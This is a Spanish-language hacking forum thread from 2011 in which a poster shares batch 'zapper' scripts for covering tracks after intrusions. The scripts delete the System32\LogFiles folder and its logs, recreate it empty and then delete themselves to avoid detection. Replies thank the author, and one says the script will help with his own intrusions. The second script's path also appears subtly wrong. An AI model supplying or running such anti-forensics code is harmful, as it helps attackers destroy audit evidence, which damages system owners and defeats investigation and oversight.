Underc0de - La Casa de los Informáticos

[In]Seguridad Informática => Hacking => Mensaje iniciado por: ANTRAX en Diciembre 02, 2011, 11:45:11 AM

Título: Zapper para Windows [Batch]
Publicado por: ANTRAX en Diciembre 02, 2011, 11:45:11 AM
Cada vez que scanneamos, hacemos una intrusion, un ping  una pc o una ip, esta deja un registro en C:\Windows\System32\LogFiles
Los Zappers sirven para borrar esos registros o logs y asi que no se sospeche o no tengan formas de descubrirnos.

Mirando un poco el codigo de Panzer de IH. Decidi modificarlo un poco, ya que note que en Windows 7 no funcionaria.
Su Codigo es el siguiente:

@echo off
pushd %systemroot%\system32\logfiles
del /f /q *.evt
del /f /q *.log
exit


Lo que hace es dirigirse al directorio de logfiles y borrar todos los *.evt y *.log que hay en ella. Pero note que en Windows 7, crea directorios y dentro de estos directorio, archivos con extensiones *.txt, *.evl entre otras...

He optado por modificar un poco el codigo:

@echo off
rd /s /q %systemroot%\Windows\System32\LogFiles
md %systemroot%\Windows\System32\LogFiles
del /f /q %0
exit


Lo que hace este codigo es eliminar la carpeta LogFiles con todo su arbol (Directorios y Archivos) y la vuelve a crear vacia. Despues de hacer estas dos cosas, se autoelimina el zapper para evitar ser detectado.
Título: Re:Zapper para Windows [Batch]
Publicado por: P1P38 en Diciembre 02, 2011, 03:16:10 PM
Que bien... muy buen aporte Antrax, lo probare.
Gracias.
Título: Re:Zapper para Windows [Batch]
Publicado por: Pr0ph3t en Diciembre 03, 2011, 02:46:00 PM
Gracias ANTRAX, me será útil.
Título: Re:Zapper para Windows [Batch]
Publicado por: k43l en Diciembre 04, 2011, 08:33:26 PM
Gracias antrax por este aporte, me servira mucho para mis intrusiones en windows seven
salu2
Título: Re:Zapper para Windows [Batch]
Publicado por: cerocool en Diciembre 07, 2011, 01:13:04 PM
Con extension lo guardo?, pregunta porque me estoy iniciando en esto
Título: Re:Zapper para Windows [Batch]
Publicado por: Pr0ph3t en Diciembre 07, 2011, 02:30:16 PM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Con extension lo guardo?, pregunta porque me estoy iniciando en esto
Sí, extensión .bat